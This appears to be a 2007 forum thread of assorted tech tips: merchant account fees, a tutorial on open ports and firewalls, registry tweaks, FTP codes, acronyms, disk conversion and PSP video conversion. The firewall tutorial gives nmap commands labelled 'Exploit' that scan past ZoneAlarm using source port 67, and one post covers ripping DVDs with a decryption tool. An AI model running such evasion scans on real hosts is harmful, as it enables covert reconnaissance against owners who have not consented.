* Fixed Transaction Fee

Usually between $0.20 and $0.30, the fixed transaction fee is the fixed fee portion of each sale. Unlike the discount rate, the fixed transaction fee is the same for every transaction. Whether you get a $1 sale or a $100 sale, the transaction fee will be the same.

* Termination Fee

A bit more hidden in the small print, a termination fee can apply if you cancel your merchant account within a specified period of time (usually within one year). But beware, some merchant providers require a three year commitment!

* Miscellaneous Fees

If a customer requests a refund and they want their credit card credited, an internet merchant provider will charge you a separate fee (usually between $10 - $20). Read the contract carefully, as other special fees may apply.


Putting It All Together

Now that the different fees have been explained, let us look at an example set of transactions to help understand what an internet merchant account may cost your business on a monthly basis.

I have created a simple formula to help you calculate your monthly charges:

Total Charges = Statement Fee + Number of Transactions x (Average Sale x Discount Rate + Fixed Transaction Fee) + (Number of Chargebacks x Chargeback Fee)

For example, let us see you sell widgets over the internet. The sales price for each widget is $10. You typically have 100 sales per month and about 5 people request refunds (chargebacks). For this example, let us assume you have signed up with Jones&Jones internet merchant account services and have the following terms:

Discount Rate - %2.5
Statement Fee - $10
Fixed Transaction Fee - $0.30
Chargeback Fee - $15

Using my formula above, your monthly Jones&Jones charges will be:

Total Charges = 10 + 100 x (10 x .025 + 0.3) + (5 x 15) = $140

You can calculate your monthly sales revenue by multiplying your sales volume by your price:

Monthly Sales Revenue = 100 x $10 = $1000

Your internet merchant provider is costing you 14% of your total sales.


Making Your Decision

Before you choose and internet merchant provider, understand all of the cost components. Use your current or projected sales data to forecast what your internet merchant account costs will be. Planning ahead can save you time and money.

Master
29-04-07, 00:39
Closing Open Holes



September 27, 2000
By Ankit Fadia

With the spread of Hackers and Hacking incidents, the time has come, when not only system administrators of servers of big companies, but also people who connect to the Internet by dialing up into their ISP, have to worry about securing their system. It really does not make much difference whether you have a static IP or a dynamic one, if your system is connected to the Internet, then there is every chance of it being attacked.

This manual is aimed at discussing methods of system security analysis and will shed light on as to how to secure your standalone (also a system connected to a LAN) system.

Open Ports: A Threat to Security?

In the Netstat Tutorial we had discussed how the netstat -a command showed the list of open ports on your system. Well, anyhow, before I move on, I would like to quickly recap the important part. So here goes, straight from the netstat tutorial:

Now, the ??a? option is used to display all open connections on the local machine. It also returns the remote system to which we are connected to, the port numbers of the remote system we are connected to (and the local machine) and also the type and state of connection we have with the remote system.

For Example,

C:\windows>netstat -a

Active Connections


Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED
TCP ankit:1036 dwarf.box.sk:ftp-data TIME_WAIT
TCP ankit:1043 banners.egroups.com:80 FIN_WAIT_2
TCP ankit:1045 mail2.mtnl.net.in:pop3 TIME_WAIT
TCP ankit:1052 zztop.boxnetwork.net:80 ESTABLISHED
TCP ankit:1053 mail2.mtnl.net.in:pop3 TIME_WAIT
UDP ankit:1025 *:*
UDP ankit:nbdatagram *:*


Now, let us take a single line from the above output and see what it stands for:

Proto Local Address Foreign Address State
TCP ankit:1031 dwarf.box.sk:ftp ESTABLISHED

Now, the above can be arranged as below:

Protocol: TCP (This can be Transmission Control Protocol or TCP, User Datagram Protocol or UDP or sometimes even, IP or Internet Protocol.)

Local System Name: ankit (This is the name of the local system that you set during the Windows setup.)

Local Port opened and being used by this connection: 1031

Remote System: dwarf.box.sk (This is the non-numerical form of the system to which we are connected.)

Remote Port: ftp (This is the port number of the remote system dwarf.box.sk to which we are connected.)

State of Connection: ESTABLISHED

?Netstat? with the ??a? argument is normally used, to get a list of open ports on your own system i.e. on the local system. This can be particularly useful to check and see whether your system has a Trojan installed or not. Yes, most good Antiviral software are able to detect the presence of Trojans, but, we are hackers, and need to software to tell us, whether we are infected or not. Besides, it is more fun to do something manually than to simply click on the ?Scan? button and let some software do it.

The following is a list of Trojans and the port numbers which they use, if you Netstat yourself and find any of the following open, then you can be pretty sure, that you are infected.



Port 12345(TCP) Netbus
Port 31337(UDP) Back Orifice

For complete list, refer to the Tutorial on Trojans at: hackingtruths.box.sk/trojans.txt
----

Now, the above tutorial resulted in a number of people raising questions like: If the 'netstat -a' command shows open ports on my system, does this mean that anyone can connect to them? Or, How can I close these open ports? How do I know if an open port is a threat to my system's security of not? Well, the answer to all these question would be clear, once you read the below paragraph:

Now, the thing to understand here is that, Port numbers are divided into three ranges:

The Well Known Ports are those from 0 through 1023. This range or ports is bound to the services running on them. By this what I mean is that each port usually has a specific service running on it. You see there is an internationally accepted Port Numbers to Services rule, (refer RFC 1700 Here) which specifies as to on what port number a particular service runs. For Example, By Default or normally FTP runs on Port 21. So if you find that Port 21 is open on a particular system, then it usually means that that particular system uses the FTP Protocol to transfer files. However, please note that some smart system administrators delibrately i.e. to fool lamers run fake services on popular ports. For Example, a system might be running a fake FTP daemon on Port 21. Although you get the same interface like the FTP daemon banner, response numbers etc, however, it actually might be a software logging your prescence and sometimes even tracing you!!!

The Registered Ports are those from 1024 through 49151. This range of port numbers is not bound to any specific service. Actually, Networking utlites like your Browser, Email Client, FTP software opens a random port within this range and starts a communication with the remote server. A port number within this range is the reason why you are able to surf the net or check your email etc.

If you find that when you give the netstat -a command, then a number of ports within this range are open, then you should probably not worry. These ports are simply opened so that you can get your software applications to do what you want them to do. These ports are opened temporarily by various applications to perform tasks. They act as a buffer transfering packets (data) received to the application and vis-a-versa. Once you close the application, then you find that these ports are closed automatically. For Example, when you type Only the registered members can see the link in your browser, then your browser randomly chooses a Registered Port and uses it as a buffer to communicate with the various remote servers involved.

The Dynamic and/or Private Ports are those from 49152 through 65535. This range is rarely used, and is mostly used by trojans, however some application do tend to use such high range port numbers. For Example,Sun starts their RPC ports at 32768.
So this basically brings us to what to do if you find that Netstat gives you a couple of open ports on your system:

1. Check the Trojan Port List and check if the open port matches with any of the popular ones. If it does then get a trojan Removal and remove the trojan.

2. If it doesn't or if the Trojan Remover says: No trojan found, then see if the open port lies in the registered Ports range. If yes, then you have nothing to worry, so forget about it.

***********************
HACKING TRUTH: A common technique employed by a number of system administrators, is remapping ports. For example, normally the default port for HTTP is 80. However, the system administrator could also remap it to Port 8080. Now, if that is the case, then the homepage hosted at that server would be at:

Only the registered members can see the link instead of
Only the registered members can see the link

The idea behind Port Remapping is that instead of running a service on a well known port, where it can easily be exploited, it would be better to run it on a not so well known port, as the hacker, would find it more difficult to find that service. He would have to port scan high range of numbers to discover port remapping.

The ports used for remapping are usually pretty easy to remember. They are choosen keeping in mind the default port number at which the service being remapped should be running. For Example, POP by default runs on Port 110. However, if you were to remap it, you would choose any of the following: 1010, 11000, 1111 etc etc

Some sysadmins also like to choose Port numbers in the following manner: 1234,2345,3456,4567 and so on... Yet another reason as to why Port Remapping is done, is that on a Unix System to be able to listen to a port under 1024, you must have root previledges.
************************


Firewalls

Use of Firewalls is no longer confined to servers or websites or commerical companies. Even if you simply dial up into your ISP or use PPP (Point to Point Protocol) to surf the net, you simply cannot do without a firewall. So what exactly is a firewall?

Well, in non-geek language, a firewall is basically a shield which protects your system from the untrusted non-reliable systems connected to the Internet. It is a software which listens to all ports on your system for any attempts to open a connection and when it detects such an attempt, then it reacts according to the predefined set of rules. So basically, a firewall is something that protects the network(or systen) from the Internet. It is derived from the concept of firewalls used in vehicles which is a barrier made of fire resistant material protecting the vehicle in case of fire.

Now, for a better 'according to the bible' defination of a firewall: A firewall is best described as a software or hardware or both Hardware and Software packet filter that allows only selected packets to pass through from the Internet to your private internal network. A firewall is a system or a group of systems which guard a trusted network( The Internal Private Network from the untrusted network (The Internet.)

NOTE: This was a very brief desciption of what a firewall is, I would not be going into the details of their working in this manual.

Anyway,the term 'Firewalls', (which were generally used by companies for commerical purposes) has evolved into a new term called 'Personal Firewalls'. Now this term is basically used to refer to firewalls installed on a standalone system which may or may not be networked i.e. It usually connects to an ISP. Or in other words a personal firewall is a firewall used for personal use.

Now that you have a basic desciption as to what a firewall is, let us move on to why exactly you need to install a Firewall? Or, how can not installing a firewall pose a threat to the security of your system?

You see, when you are connected to the Internet, then you have millions of other untrusted systems connected to it as well. If somehow someone found out your IP address, then they could do probably anything to your system. They could exploit any vulnerability existing in your system, damage your data, and even use your system to hack into other computers.

Finding out someone'e IP Address is not very difficult. Anybody can find out your IP, through various Chat Services, Instant Messengers (ICQ, MSN, AOL etc), through a common ISP and numerous other ways. Infact finding out the IP Address of a specific person is not always the priority of some hackers.

What I mean to say by that is that there are a number of Scripts and utilities available which scan all IP addresses between a certain range for predefined common vulnerabilities. For Example, Systems with File Sharing Enabled or a system running an OS which is vulnerable to the Ping of Death attack etc etc As soon as a vulnerable system is found, then they use the IP to carry out the attacks.

The most common scanners look for systems with RAT's or Remote Administration Tools installed. They send a packet to common Trojan ports and display whether the victim's system has that Trojan installed or not. The 'Scan Range of IP Addresses' that these programs accept are quite wide and one can easily find a vulnerable system in the matter of minutes or even seconds.

Trojan Horses like Back Orifice provide remote access to your system and can set up a password sniffer. The combination of a back door and a sniffer is a dangerous one: The back door provides future remote access, while the sniffer may reveal important information about you like your other Passwords, Bank Details, Credit Card Numbers, Social Security Number etc If your home system is connected to a local LAN and the attacker manages to install a backdoor on it, then you probably have given the attacker the same access level to your internal network, as you have. This wouls also mean that you will have created a back door into your network that bypasses any firewall that may be guarding the front door.

You may argue with me that as you are using a dial up link to your ISP via PPP, the attacker would be able to access your machine only when you are online. Well, yes that is true, however, not completely true. Yes, it does make access to your system when you reconnect, difficult, as you have a dynamic Internet Protocol Address. But, although this provides a faint hope of protection, routine scanning of the range of IP's in which your IP lies, will more often than not reveal your current Dynamic IP and the back door will provide access to your system.

*******************
HACKING TRUTH: Microsoft Says: War Dialer programs automatically scan for modems by trying every phone number within an exchange. If the modem can only be used for dial-out connections, a War Dialer won't discover it. However, PPP changes the equation, as it provides bidirectional transportmaking any connected system visible to scanners?and attackers.
*******************

So how do I protect myself from such Scans and unsolicitated attacks? Well, this is where Personal Firewalls come in. They just like their name suggests, protect you from unsolicitated connection probes, scans, attacks.

They listen to all ports for any connection requests received (from both legitimate and fake hosts) and sent (by applications like Browser, Email Client etc.) As soon as such an instance is recorded, it pops up a warning asking you what to do or whether to allow the connection to initiate or not. This warning message also contains the IP which is trying to initiate the connection and also the Port Number to which it is trying to connect i.e. the Port to which the packet was sent. It also protects your system from Port Scans, DOS Attacks, Vulnerability attacks etc. So basically it acts as a shield or a buffer which does not allow your system to communicate with the untrusted systems directly.

Most Personal Firewalls have extensive logging facilities which allows you to track down the attackers. Some popular firewalls are:

1.BlackICE Defender : An IDS for PC's. It's available at Only the registered members can see the link

2. ZoneAlarm: The easiest to setup and manage firewall. Get it for free at: Only the registered members can see the link

Once you have installed a firewall on your system, you will often get a number of Warnings which might seem to be as if someone is trying to break into your system, however, they are actually bogus messages, which are caused by either your OS itself or due to the process called Allocation of Dynamic IP's. For a details description of these two, read on.

Many people complain that as soon as they dial into their ISP, their firewall says that such and such IP is probing Port X. What causes them?
Well, this is quite common. The cause is that somebody hung up just before you dialed in and your ISP assigned you the same IP address. You are now seeing the remains of communication with the previous person. This is most common when the person to which the IP was assigned earlier was using ICQ or chat programs, was connected to a Game Server or simply turned off his modem before his communication with remote servers was complete.

You might even get a message like: Such and Such IP is trying to initaite a Netbios Session on Port X. This again is extrememly common. The following is an explanation as to why it happens, which I picked up a couple of days ago: NetBIOS requests to UDP port 137 are the most common item you will see in your firewall reject logs. This comes about from a feature in Microsoft's Windows: when a program resolves an IP address into a name, it may send a NetBIOS query to IP address. This is part of the background radiation of the Internet, and is nothing to be concerned about.

What Causes them? On virtually all systems (UNIX, Macintosh, Windows), programs call the function 'gethostbyaddr()' with the desired address. This function will then do the appropriate lookup, and return the name. This function is part of the sockets API. The key thing to remember about gethostbyaddr() is that it is virtual. It doesn't specify how it resolves an address into a name. In practice, it will use all available mechanisms. If we look at UNIX, Windows, and Macintosh systems, we see the following techniques:

DNS in-addr.arpa PTR queries sent to the DNS server
NetBIOS NodeStatus queries sent to the IP address
lookups in the /etc/hosts file
AppleTalk over IP name query sent to the IP address
RPC query sent to the UNIX NIS server
NetBIOS lookup sent to the WINS server

Windows systems do the /etc/hosts, DNS, WINS, and NodeStatus techniques. In more excruciating detail, Microsoft has a generic system component called a naming service. All the protocol stacks in the system (NetBIOS, TCP/IP, Novel IPX, AppleTalk, Banyan, etc.) register the kinds of name resolutions they can perform. Some RPC products will likewise register an NIS naming service. When a program requests to resolve an address, this address gets passed onto the generic naming service. Windows will try each registered name resolution subsystem sequentially until it gets an answer.

(Side note: User's sometimes complained that accessing Windows servers is slow. This is caused by installing unneeded protocol stacks that must timeout first before the real protocol stack is queried for the server name.).

The order in which it performs these resolution steps for IP addresses can be configured under the Windows registry key

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\ServiceProvider.

Breaking Through Firewalls

Although Firewalls are meant to provide your complete protection from Port Scan probes etc there are several holes existing in popular firewalls, waiting to be exploited. In this issue, I will discuss a hole in ZoneAlarm Version 2.1.10 to 2.0.26, which allows the attacker to port scan the target system (Although normally it should stop such scans.)

If one uses port 67 as the source port of a TCP or UDP scan, ZoneAlarm will let the packet through and will not notify the user. This means, that one can TCP or UDP port scan a ZoneAlarm protected computer as if there were no firewall there IF one uses port 67 as the source port on the packets.

Exploit:
UDP Scan:
You can use NMap to port scan the host with the following command line:

nmap -g67 -P0 -p130-140 -sU 192.168.128.88

(Notice the -g67 which specifies source port).

TCP Scan:
You can use NMap to port scan the host with the following command line:

nmap -g67 -P0 -p130-140 -sS 192.168.128.88

(Notice the -g67 which specifies source port).


Ankit Fadia

Master
29-04-07, 00:41
add the open cmd prompt to folder context menus
also drives and My Computer

copy what's in the code area to notepad and save as cmd here.reg

CODE

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Drive\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_CLASSES_ROOT\Directory\shell\cmd]
@="Command Prompt"

[HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE 0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
@="Command Prompt"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE 0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
@="cmd.exe /k \"cd %L\""

Master
29-04-07, 00:41
~~~~~~~~~COMMON FTP ERROR CODES~~~~~~~~~~

# Description

110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").

120 Service ready in nnn minutes.

125 Data connection already open; transfer starting.

150 File status okay; about to open data connection.

200 Command okay.

202 Command not implemented, superfluous at this site.

211 System status, or system help reply.

212 Directory status.

213 File status.

214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.

215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.

220 Service ready for new user.

221 Service closing control connection.

225 Data connection open; no transfer in progress.

226 Closing data connection. Requested file action successful (for example, file transfer or file abort).

227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).

230 User logged in, proceed. Logged out if appropriate.

250 Requested file action okay, completed.

257 "PATHNAME" created.

331 User name okay, need password.

332 Need account for login.

350 Requested file action pending further information

421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down.

425 Can't open data connection.

426 Connection closed; transfer aborted.

450 Requested file action not taken.

451 Requested action aborted. Local error in processing.

452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy).

500 Syntax error, command unrecognized. This may include errors such as command line too long.

501 Syntax error in parameters or arguments.

502 Command not implemented.

503 Bad sequence of commands.

504 Command not implemented for that parameter.

530 Not logged in.

532 Need account for storing files.

550 Requested action not taken. File unavailable (e.g., file not found, no access).

551 Requested action aborted. Page type unknown.

552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).

553 Requested action not taken. File name not allowed.

Master
29-04-07, 00:42
ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DSL - See ASDL
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB � MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology

Master
29-04-07, 00:43
You may not realize it, but your computer and your car have something in common: they both need regular maintenance. No, you don't need to change your computer's oil. But you should be updating your software, keeping your antivirus subscription up to date, and checking for spyware. Read on to learn what you can do to help improve your computer's security.


Getting started

Here are some basics maintenance tasks you can do today to start improving your computer's security. Be sure you make these part of your ongoing maintenance as well.

* Sign up for software update e-mail notices. Many software companies will send you e-mail whenever a software update is available. This is particularly important for your operating system (e.g., Microsoft VV!|VD0VV$® or Macintosh), your antivirus program, and your firewall.
* Register your software. If you still have registration forms for existing software, send them in. And be sure to register new software in the future. This is another way for the software manufacturer to alert you when new updates are available.
* Install software updates immediately.
When you get an update notice, download the update immediately and install it. (Remember, downloading and installing are two separate tasks.)
An ounce of prevention

A few simple steps will help you keep your files safe and clean.

* Step 1: Update your software
* Step 2: Backup your files
* Step 3: Use antivirus software and keep it updated
* Step 4: Change your passwords


Developing ongoing maintenance practices

Now that you've done some ground work, it's time to start moving into longer term maintenance tasks. These are all tasks that you should do today (or as soon as possible) to get started. But for best results, make these a part of a regular maintenance schedule. We recommend setting aside time each week to help keep your computer secure.

* Back up your files. Backing up your files simply means creating a copy of your computer files that you can use in the event the originals are lost. (Accidents can happen.) To learn more read our tips for backing up information.


* Scan your files with up to date antivirus software. Use your antivirus scan tool regularly to search for potential computer viruses and worms. Also, check your antivirus program's user manual to see if you can schedule an automatic scan of your computer. To learn more, read our tips for reducing your virus risk
.
* Change your passwords. Using the same password increases the odds that someone else will discover it. Change all of your passwords regularly (we recommend monthly) to reduce your risk. Also, choose your passwords carefully. To learn more, read our tips for creating stronger passwords
.

Making a schedule

One of the best ways to help protect your computer is to perform maintenance regularly. To help you keep track, we suggest making a regular "appointment" with your computer. Treat it like you would any other appointment. Record it in your datebook or online calendar, and if you cannot make it, reschedule. Remember, you are not only helping to improve your computer, you are also helping to protect your personal information.

Master
29-04-07, 00:44
Configuring ZoneAlarm Security Settings
(

If you're running ZoneAlarm Pro you will probably have considered that most of the "advanced" settings might as well be in Chinese for all the use they are. User friendly they are not!

If you are not on a LAN (connected to another computer in a network) you can use this guide to give your firewall some real muscle and a new lease of life:

Launch ZoneAlarm Pro and click to highlight the "Firewall" tab on the left hand side . In the pane that appears on the right hand side in the section "Internet Zone Security" set the slider control to "High" Then click the "Custom" button in the same section.

The next settings page is divided into two sections with tabs Internet Zone and Trusted Zone at the top of the page. Under the Internet Zone tab there is a list of settings that can be accessed by scrolling. At the top is the high security settings and the only thing that should check from there is "allow broadcast/multicast". The rest should be unchecked.

Scroll down until you get to the medium security settings area. Check all the boxes in this section until you get to "Block Incomming UDP Ports". When you check that you will be asked to supply a list of ports, and in the field at the bottom of the page enter 1-65535

Then go back to the list and check the box alongside "Block Outgoing UDP Ports" and at the bottom of the page enter 1-19, 22-79, 82-7999, 8082-65535

Repeat this proceedure for the following settings
"Block Incomming TCP Ports": 1-65535
"Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
Then click "Apply", "Ok" at the bottom of the page.

Back in the right hand "Firewall" pane go next to the yellow "Trusted Zone Security" section and set it to "high" with the slider. Click "Custom" and repeat the above proceedure this time choosing the Trusted Zone tab at the top of the settings page.

These settings will stop all incoming packets @ports 1-65535 and also block all pings, trojans etc... this will also stop all spyware or applications from phoning home from your drive without your knowledge!

Master
29-04-07, 00:44
If you are feeling adventurous ...

If you have a PlayStation and a PC, and do not have a pad for the computer, or simply those that there are in the market seem to you too expensive or any you don't like, you have a great option here. It connects your PlayStation pad (anyone) to your PC conserving ALL its functionality thanks to the excellent driver DirectPad.

Advantages

*

It enjoys the ample range of pads that exists mainly for PlayStation and, of its compared price those of PC (speaking in terms quality-price).

*

They work for all pads including the dual-shock pads. Also, with the dual-shock ones you will be able to use both analog controls and the capacity for "vibrating" (Force Feedback) in Windows games that support it (Need Speed III, Incoming, Star Wars Rogue Squadron, Flight Simulator, Forsaken, etc). If you want to see the complete list of games that support the Force Feedback, look here.

*

You will be able to use ALL the buttons of PlayStation pad in your preferred games, altogether 10 if you use digitals or 16 if you use the analog control.

*

You can connect simultaneously up to two pads.

*

With the dual-shock pads you will be able to change between the digital control to analog during any game session.

*

If you already have standard PC pad you will be able to use it simultaneously without losing functionality in either of them (if connecting two joysticks/pads by a Y connector and to the game port, you will only be able to use 2 buttons in each joystick/pad)

*

The assembly is not very complicated.

*

In theory it would have to work with any control system of game for PlayStation (pad of another mark, steering wheel, etc).

Disadvantages

*

You will only be able to use it in Windows games, since driver it is programmed for DirectX.

*

If you want to use the dual-shock you will need an external power supply, or steal power from inside the computer.

*

The connection goes to the parallel port, which means that if you are going to use the printer you change connectors... but it is worth the trouble!

Words before beginning

Following with the preliminaries, I will going to make clear that you do not need any knowledge electronics, although knowing how to solder and know how to handle a multi-meter. If you do not have any idea, or don't want to do it get a friend who knows to help you.


Only the registered members can see the link

Master
29-04-07, 00:45
Convert Stubborn Webpage To .pdf

I have come across some websites that i wanted to save the page for later review. I found that i was having some problems with certain sites. I found a way around it.

what you need:adobe acrobat 6 pro or better
popupcop

there may be a simpler way to do this but i found that this works:

when at a webpage that you want to copy (YOU MUST BE USING IE AND HAVE BOTH POPUPCOP INSTALLED AND ADOBE ACROBAT 6 PRO OR HIGHER, ACROBAT ICON MUST BE IN IE TOOLBAR TO CONVERT TO .PDF), slide popupcops popup intensity bar to the far left, now click on adobe acrobat icon to convert webpage to .pdf document. I have yet to find a webpage where this trick does not work.

Master
29-04-07, 00:47
Windows XP Professional supports two types of disk storage: basic and dynamic. Basic disk storage uses partition-oriented disks. A basic disk contains basic volumes (primary partitions, extended partitions, and logical drives).

Dynamic disk storage uses volume-oriented disks, and includes features that basic disks do not, such as the ability to create volumes that span multiple disks (spanned and striped volumes).

General Notes
Before you change a basic disk to a dynamic disk, note these items:


You must have at least 1 megabyte (MB) of free space on any master boot record (MBR) disk that you want to convert. This space is automatically reserved when the partition or volume is created in Microsoft Windows 2000 or Windows XP Professional. However, it may not be available on partitions or volumes that are created in other operating systems.

When you convert to a dynamic disk, the existing partitions or logical drives on the basic disk are converted to simple volumes on the dynamic disk.

After you convert to a dynamic disk, the dynamic volumes cannot be changed back to partitions. You must first delete all dynamic volumes on the disk, and then convert the dynamic disk back to a basic disk. If you want to keep your data, you must first back up or move the data to another volume.

After you convert to a dynamic disk, local access to the dynamic disk is limited to Windows XP Professional and Windows 2000.

If your disk contains multiple installations of Windows XP Professional or Windows 2000, do not convert to a dynamic disk. The conversion operation removes partition entries for all partitions on the disk with the exception of the system and boot volumes for the current operating system.

Dynamic disks are not supported on portable computers or Microsoft Windows XP Home Edition.

Before you change a dynamic disk back to a basic disk, note that all existing volumes must be deleted from the disk before you can convert it back to a basic disk. If you want to keep your data, back up the data, or move your data to another volume.

How to Convert a Basic Disk to a Dynamic Disk

To convert a basic disk to a dynamic disk:

1) Log on as Administrator or as a member of the Administrators group.

2) Click Start, and then click Control Panel.

3) Click Performance and Maintenance, click Administrative Tools, and then double-click Computer Management.

4) In the left pane, click Disk Management.

5) In the lower-right pane, right-click the basic disk that you want to convert, and then click Convert to Dynamic Disk.

NOTE:You must right-click the gray area that contains the disk title on the left side of the Details pane. For example, right-click Disk 0.

6) Select the check box that is next to the disk that you want to convert (if it is not already selected), and then clickOK.

7) Click Details if you want to view the list of volumes in the disk.

8) Click Convert.

9) Click Yes when you are prompted to convert, and then click OK.

How to Convert a Dynamic Disk to a Basic Disk

To change a dynamic disk back to a basic disk:

1) Back up all the data on all the volumes on the disk you want to convert to a basic disk.

2) Log on as Administrator or as a member of the Administrators group.

3) Click Start, and then click Control Panel.

4) Click Performance and Maintenance, click Administrative Tools, and then double-click Computer Management.

5) In the left pane, click Disk Management.

6) Right-click a volume on the dynamic disk that you want to change to a basic disk, and then click Delete Volume.

7) Click Yes when you are prompted to delete the volume.

8) Repeat steps 4 and 5 for each volume on the dynamic disk.

9) After you have deleted all the volumes on the dynamic disk, right-click the dynamic disk that you want to change to a basic disk, and then click Convert to Basic Disk.

NOTE:You must right-click the gray area that contains the disk title on the left side of the Details pane. For example, right-click Disk 1.

Master
29-04-07, 00:47
Converting Movies To Psp Format.

Hey again, this is a real quick guide for anyone interested to get a movie onto there PSP without all the fluff i have seen elsewhere. I just watched Africa the Serengeti on my PSP and heres is the lowdown.

Movie - approx 40 minutes - dvd
Saved to hard drive - 2.6GIG - using DVD Decryptor (free program) try google
Transfered to avi format - 377MB- using Super DVD Ripper (9 FREE trial uses) then you must buy
Transfered to MP4 - 37MB - using the (basically free) Image convertor 2

Average movie breakdown - using above as a guide only.
so im guessing the average movie may be 4.5gig for example
saved to 800MB
CONVERTED TO 70-80MB

Ok use DVD decryptor to save the movie to your hard drive eg. C:\africa (it will save it for you as described)
When completed find the folder c:\africa on your computer and find the vob file in that folder - generally the largest one and right click and play it with your dvd program to see what part it is. If its the correct movie part you now know thats the one you need.

Once you have located the vob file you want to transfer open DVD Ripper and go to wizard icon. There you will see an icon of VOB to AVI button. Click it and then it will ask to locate the file. Locate the file and click it. It will SCAN THE FILE(just wait till that finishes) a parameter box opens next and just click the arrow. It then askes to choose output file, click the file icon and locate the correct fob file. It then askes for file compression - choose microsoft windows media and then click ok Then press the start button. It will now convert the vob into avi format.
